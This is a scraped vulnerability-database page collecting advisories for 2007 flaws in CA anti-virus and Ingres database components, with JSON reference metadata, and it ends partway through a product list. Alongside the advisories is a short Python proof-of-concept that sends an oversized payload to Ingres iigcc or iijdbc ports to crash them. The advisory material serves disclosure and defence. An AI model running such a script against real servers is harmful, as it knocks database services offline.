http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2007 CA. All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 9.5.3 (Build 5003)\n\nwj8DBQFGaCc7eSWR3+KUGYURAnegAKCFM9tJ6RgdwIAc9JRfOcx807pEHwCdHofV\ns2hnGDiljhAMZquR9D1uya8=\n=PQi4\n-----END PGP SIGNATURE-----\n. \nMore details can be found at:\n \nhttp://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp\n\n-- Disclosure Timeline:\n2007.02.16 - Vulnerability reported to vendor\n2007.06.05 - Coordinated public release of advisory\n\n-- Credit:\nThis vulnerability was discovered by an anonymous researcher. \n\n-- About the Zero Day Initiative (ZDI):\nEstablished by TippingPoint, a division of 3Com, The Zero Day Initiative\n(ZDI) represents a best-of-breed model for rewarding security\nresearchers for responsibly disclosing discovered vulnerabilities. \n\nResearchers interested in getting paid for their security research\nthrough the ZDI can find more information and sign-up at:\n\n http://www.zerodayinitiative.com\n\nThe ZDI is unique in how the acquired vulnerability information is used. \n3Com does not re-sell the vulnerability details or any exploit code. \nInstead, upon notifying the affected product vendor, 3Com provides its\ncustomers with zero day protection through its intrusion prevention\ntechnology. Explicit details regarding the specifics of the\nvulnerability are not exposed to any parties until an official vendor\npatch is publicly available. Furthermore, with the altruistic aim of\nhelping to secure a broader user base, 3Com provides this vulnerability\ninformation confidentially to security vendors (including competitors)\nwho have a vulnerability protection or mitigation product. \n\n\nCONFIDENTIALITY NOTICE: This e-mail message, including any attachments,\nis being sent by 3Com for the sole use of the intended recipient(s) and\nmay contain confidential, proprietary and/or privileged information. \nAny unauthorized review, use, disclosure and/or distribution by any \nrecipient is prohibited. If you are not the intended recipient, please\ndelete and/or destroy all copies of this message regardless of form and\nany included attachments and notify 3Com immediately by contacting the\nsender via reply e-mail or forwarding to 3Com at postmaster@3com.com",
"sources": [
{
"db": "NVD",
"id": "CVE-2007-2864"
},
{
"db": "CERT/CC",
"id": "VU#739409"
},
{
"db": "CERT/CC",
"id": "VU#105105"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001196"
},
{
"db": "ZDI",
"id": "ZDI-07-035"
},
{
"db": "BID",
"id": "24330"
},
{
"db": "VULHUB",
"id": "VHN-26226"
},
{
"db": "PACKETSTORM",
"id": "57100"
},
{
"db": "PACKETSTORM",
"id": "57067"
}
],
"trust": 4.23
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-26226",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-26226"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "SECUNIA",
"id": "25570",
"trust": 4.1
},
{
"db": "NVD",
"id": "CVE-2007-2864",
"trust": 3.7
},
{
"db": "CERT/CC",
"id": "VU#105105",
"trust": 3.6
},
{
"db": "ZDI",
"id": "ZDI-07-035",
"trust": 3.4
},
{
"db": "BID",
"id": "24330",
"trust": 2.8
},
{
"db": "OSVDB",
"id": "35245",
"trust": 2.6
},
{
"db": "SECTRACK",
"id": "1018199",
"trust": 2.5
},
{
"db": "VUPEN",
"id": "ADV-2007-2072",
"trust": 2.5
},
{
"db": "ZDI",
"id": "ZDI-07-034",
"trust": 1.2
},
{
"db": "CERT/CC",
"id": "VU#739409",
"trust": 0.8
},
{
"db": "XF",
"id": "34737",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001196",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-154",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-200706-098",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "57067",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "83164",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "16677",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-71185",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-26226",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "35244",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "57100",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#739409"
},
{
"db": "CERT/CC",
"id": "VU#105105"
},
{
"db": "ZDI",
"id": "ZDI-07-035"
},
{
"db": "VULHUB",
"id": "VHN-26226"
},
{
"db": "BID",
"id": "24330"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001196"
},
{
"db": "PACKETSTORM",
"id": "57100"
},
{
"db": "PACKETSTORM",
"id": "57067"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-098"
},
{
"db": "NVD",
"id": "CVE-2007-2864"
}
]
},
"id": "VAR-200706-0018",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-26226"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-10T23:01:14.478000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Anti-Virus\u30a8\u30f3\u30b8\u30f3\u3092\u5b9f\u88c5\u3057\u3066\u3044\u308bCA\u88fd\u54c1\u306b\u304a\u3051\u308b\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u306b\u95a2\u3059\u308b\u304a\u77e5\u3089\u305b",
"trust": 0.8,
"url": "http://www.casupport.jp/resources/anti_virus_engine_security.htm"
},
{
"title": "sk33132",
"trust": 0.8,
"url": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=\u0026solutionid=sk33132"
},
{
"title": "35396",
"trust": 0.8,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35396"
},
{
"title": "Computer Associates has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp"
},
{
"title": "CA CAB File header parsing remote stack overflow vulnerability repair measures",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=146809"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-07-035"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001196"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-098"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2007-2864"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 4.4,
"url": "http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp"
},
{
"trust": 2.8,
"url": "http://www.kb.cert.org/vuls/id/105105"
},
{
"trust": 2.7,
"url": "http://www.zerodayinitiative.com/advisories/zdi-07-035.html"
},
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/24330"
},
{
"trust": 2.5,
"url": "http://www.osvdb.org/35245"
},
{
"trust": 2.5,
"url": "http://www.securitytracker.com/id?1018199"
},
{
"trust": 2.5,
"url": "http://secunia.com/advisories/25570"
},
{
"trust": 2.5,
"url": "http://www.vupen.com/english/advisories/2007/2072"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/470602/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/470754/100/0/threaded"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34737"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25570/"
},
{
"trust": 1.2,
"url": "http://www.zerodayinitiative.com/advisories/zdi-07-034.html"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-2864"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/34737"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-2864"
},
{
"trust": 0.3,
"url": "http://www.ca.com"
},
{
"trust": 0.3,
"url": "/archive/1/470754"
},
{
"trust": 0.3,
"url": "/archive/1/470602"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-2864"
},
{
"trust": 0.1,
"url": "http://osvdb.org/35245"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com."
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-2863"
},
{
"trust": 0.1,
"url": "http://osvdb.org/35244"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=144680"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35396"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35395"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-2863"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securit"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#739409"
},
{
"db": "CERT/CC",
"id": "VU#105105"
},
{
"db": "ZDI",
"id": "ZDI-07-035"
},
{
"db": "VULHUB",
"id": "VHN-26226"
},
{
"db": "BID",
"id": "24330"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001196"
},
{
"db": "PACKETSTORM",
"id": "57100"
},
{
"db": "PACKETSTORM",
"id": "57067"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-098"
},
{
"db": "NVD",
"id": "CVE-2007-2864"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#739409"
},
{
"db": "CERT/CC",
"id": "VU#105105"
},
{
"db": "ZDI",
"id": "ZDI-07-035"
},
{
"db": "VULHUB",
"id": "VHN-26226"
},
{
"db": "BID",
"id": "24330"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001196"
},
{
"db": "PACKETSTORM",
"id": "57100"
},
{
"db": "PACKETSTORM",
"id": "57067"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-098"
},
{
"db": "NVD",
"id": "CVE-2007-2864"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-06-06T00:00:00",
"db": "CERT/CC",
"id": "VU#739409"
},
{
"date": "2007-06-06T00:00:00",
"db": "CERT/CC",
"id": "VU#105105"
},
{
"date": "2007-06-05T00:00:00",
"db": "ZDI",
"id": "ZDI-07-035"
},
{
"date": "2007-06-06T00:00:00",
"db": "VULHUB",
"id": "VHN-26226"
},
{
"date": "2007-06-05T00:00:00",
"db": "BID",
"id": "24330"
},
{
"date": "2009-03-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-001196"
},
{
"date": "2007-06-10T23:43:37",
"db": "PACKETSTORM",
"id": "57100"
},
{
"date": "2007-06-07T06:15:45",
"db": "PACKETSTORM",
"id": "57067"
},
{
"date": "2007-06-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200706-098"
},
{
"date": "2007-06-06T21:30:00",
"db": "NVD",
"id": "CVE-2007-2864"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-06-06T00:00:00",
"db": "CERT/CC",
"id": "VU#739409"
},
{
"date": "2007-06-06T00:00:00",
"db": "CERT/CC",
"id": "VU#105105"
},
{
"date": "2007-06-05T00:00:00",
"db": "ZDI",
"id": "ZDI-07-035"
},
{
"date": "2018-10-16T00:00:00",
"db": "VULHUB",
"id": "VHN-26226"
},
{
"date": "2009-09-28T20:10:00",
"db": "BID",
"id": "24330"
},
{
"date": "2009-03-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-001196"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200706-098"
},
{
"date": "2025-04-09T00:30:58.490000",
"db": "NVD",
"id": "CVE-2007-2864"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "57100"
},
{
"db": "PACKETSTORM",
"id": "57067"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-098"
}
],
"trust": 0.8
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Computer Associates Anti-Virus engine fails to properly handle long file names in CAB archives",
"sources": [
{
"db": "CERT/CC",
"id": "VU#739409"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200706-098"
}
],
"trust": 0.6
}
}
VAR-200706-0395
Vulnerability from variot - Updated: 2025-04-10 22:57Multiple heap-based buffer overflows in the (1) Communications Server (iigcc.exe) and (2) Data Access Server (iigcd.exe) components for Ingres Database Server 3.0.3, as used in CA (Computer Associates) products including eTrust Secure Content Manager r8 on Windows, allow remote attackers to execute arbitrary code via unknown vectors. Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file.
3) Ingres wakeup file overwrite (reported by NGSSoftware) [Ingres bug 115913, CVE-2007-3337, CAID 35451] Description: The "wakeup" binary creates a file named "alarmwkp.def" in the current directory, truncating the file if it already exists. The "wakeup" binary is setuid "ingres" and world-executable. Consequently, an attacker can truncate a file with the privileges of the "ingres" user.
4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) [Ingres bug 115911, CVE-2007-3338, CAID 35452] Description: An attacker can pass a long string as an argument to uuid_from_char() to cause a stack buffer overflow and the saved returned address can be overwritten.
5) Ingres verifydb local stack overflow (reported by NGSSoftware) [Ingres bug 115911, CVE-2007-3338, CAID 35452] Description: A local attacker can exploit a stack overflow in the Ingres verifydb utility duve_get_args function. This only affects Ingres on the Windows operating system. Reported by iDefense as IDEF2023. This only affects Ingres on the Windows operating system. Reported by iDefense as IDEF2022.
Mitigating Factors: None
Severity: CA has given these vulnerabilities a cumulative High risk rating.
Affected Products: Advantage Data Transformer r2.2 AllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1 AllFusion Harvest Change Manager r7, r7.1 BrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, Linux and Mainframe Linux) BrightStor ARCserve Backup for Laptops and Desktops r11.5 BrightStor Enterprise Backup (Unix only) r10.5 BrightStor Storage Command Center r11.5 BrightStor Storage Resource Manager r11.5 CleverPath Aion Business Rules Expert r10.1 CleverPath Aion Business Process Monitoring r10.1 CleverPath Predictive Analysis Server r3 DocServer 1.1 eTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2 eTrust Audit r8 SP2 eTrust Directory r8.1 eTrust IAM Suite r8.0 eTrust IAM Toolkit r8.0, r8.1 eTrust Identity Manager r8.1 eTrust Network Forensics r8.1 eTrust Secure Content Manager r8 eTrust Single Sign-On r7, r8, r8.1 eTrust Web Access Control 1.0 Unicenter Advanced Systems Management r11 Unicenter Asset Intelligence r11 Unicenter Asset Management r11 Unicenter Asset Portfolio Management r11.2.1, r11.3 Unicenter CCS r11 Unicenter Database Command Center r11.1 Unicenter Desktop and Server Management r11 Unicenter Desktop Management Suite r11 Unicenter Enterprise Job Manager r1 SP3, r1 SP4 Unicenter Job Management Option r11 Unicenter Lightweight Portal 2 Unicenter Management Portal r3.1.1 Unicenter Network and Systems Management r3.0, r11 Unicenter Network and Systems Management - Tiered - Multi Platform r3.0 0305, r3.1 0403, r11.0 Unicenter Patch Management r11 Unicenter Remote Control 6, r11 Unicenter Service Accounting r11, r11.1 Unicenter Service Assure r2.2, r11, r11.1 Unicenter Service Catalog r11, r11.1 Unicenter Service Delivery r11.0, r11.1 Unicenter Service Intelligence r11 Unicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1 Unicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, r11.1, r11.2 Unicenter Software Delivery r11 Unicenter TNG 2.4, 2.4.2, 2.4.2J Unicenter Workload Control Center r1 SP3, r1 SP4 Unicenter Web Services Distributed Management 3.11, 3.50 Wily SOA Manager 7.1
Affected Platforms: All operating system platforms supported by the various CA products that embed Ingres. This includes Windows, Linux, and supported UNIX platforms.
Status and Recommendation: CA recommends that customers apply the appropriate fix(es) listed on the Security Notice page: http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp
Workaround: None
References (URLs may wrap): CA SupportConnect: http://supportconnect.ca.com/ CA SupportConnect Security Notice for these vulnerabilities: Ingres Security Alert http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp Important Security Notice for Customers Using Products That Embed Ingres http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp CA Security Advisor posting: CA Products That Embed Ingres Multiple Vulnerabilities http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778 CA Vuln ID (CAID): 35450, 35451, 35452, 35453 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453 Ingres knowledge base document: http://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl Reported By: NGSSoftware, and iDefense NGSSoftware Advisory: http://www.ngssoftware.com/research/advisories/ iDefense Advisory: Ingres Database Multiple Heap Corruption Vulnerabilities http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546 CVE References: CVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334 OSVDB References: Pending http://osvdb.org/
Changelog for this advisory: v1.0 - Initial Release
Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com.
For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form. URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx
Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2007 CA. All rights reserved. Ingres Database Multiple Heap Corruption Vulnerabilities
iDefense Security Advisory 06.21.07 http://labs.idefense.com/intelligence/vulnerabilities/ Jun 21, 2007
I. BACKGROUND
Ingres is the database backend used by default in several CA products. The SCM (Secure Content Manager) is one of the products that uses Ingres. The SCM use Ingres to store quarantined virii and blocked HTTP requests/replies. For more information visit the following URLs.
http://www3.ca.com/solutions/Product.aspx?ID=1013
http://www.ingres.com/
II. The Communications Server is the main component responsible for receiving and handling requests from the network. The Data Access Server is responsible for handling requests from the Ingres JDBC Driver and .NET data providers. These requests are decoded into Ingres internal formats and passed on to other components of the database server.
The application does not properly validate the length of attacker supplied data before copying it into a fixed size heap buffer. This leads to an exploitable condition.
III. ANALYSIS
Exploitation allows an unauthenticated attacker to execute arbitrary code with SYSTEM privileges.
In order to exploit this vulnerability an attacker would have to send a malformed request to the database server. This requires the ability to establish a TCP session on port 10916 (iigcc) or 10923 (iigcd).
Exploitation has been demonstrated to be trivial.
IV. Previous versions may also be affected. In addition, any application that uses the Ingres Database may be vulnerable.
V. WORKAROUND
Employing firewalls or other access control methods can effectively reduce exposure to this vulnerability.
VI. VENDOR RESPONSE
CA has made fixes available for all supported CA products that embed Ingres. For more information consult CA's Security Alert at the following URL.
http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-3334 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.
VIII. DISCLOSURE TIMELINE
01/16/2007 Initial vendor notification 01/17/2007 Initial vendor response 06/21/2007 Coordinated public disclosure
IX. CREDIT
The discoverer of this vulnerability wishes to remain anonymous.
Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events http://labs.idefense.com/
X. LEGAL NOTICES
Copyright \xa9 2007 iDefense, Inc.
Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
Date: 2010-08-14
Author: fdisk
Version: 2.6
Tested on: Windows 2003 Server SP1 en
CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
Notes: Fixed in the last version.
please let me know if you are/were able to get code execution
import socket import sys
if len(sys.argv) != 4: print "Usage: ./CAAdvantageDoS.py " print "Vulnerable Services: iigcc, iijdbc" sys.exit(1)
host = sys.argv[1] port = int(sys.argv[2]) service = sys.argv[3]
if service == "iigcc": payload = "\x41" * 2106 elif service == "iijdbc": payload = "\x41" * 1066 else: print "Vulnerable Services: iigcc, iijdbc" sys.exit(1)
payload += "\x42" * 4
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) print "Sending payload" s.send(payload) data = s.recv(1024) s.close() print 'Received', repr(data)
print service + " crashed"
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200706-0395",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "database server",
"scope": "eq",
"trust": 1.8,
"vendor": "ingres",
"version": "3.0.3"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "8.0"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "r8"
},
{
"model": "windows",
"scope": null,
"trust": 0.8,
"vendor": "microsoft",
"version": null
},
{
"model": "all windows",
"scope": null,
"trust": 0.6,
"vendor": "microsoft",
"version": null
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "20060"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "3.0.3"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "2.6"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "2.5"
},
{
"model": "associates wily soa manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates unicenter workload control center 1.0.sp4",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates unicenter workload control center sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4.2"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter tng 2.4.2j",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter serviceplus service desk sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter serviceplus service desk sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.5"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0.2"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter service delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter service catalog",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
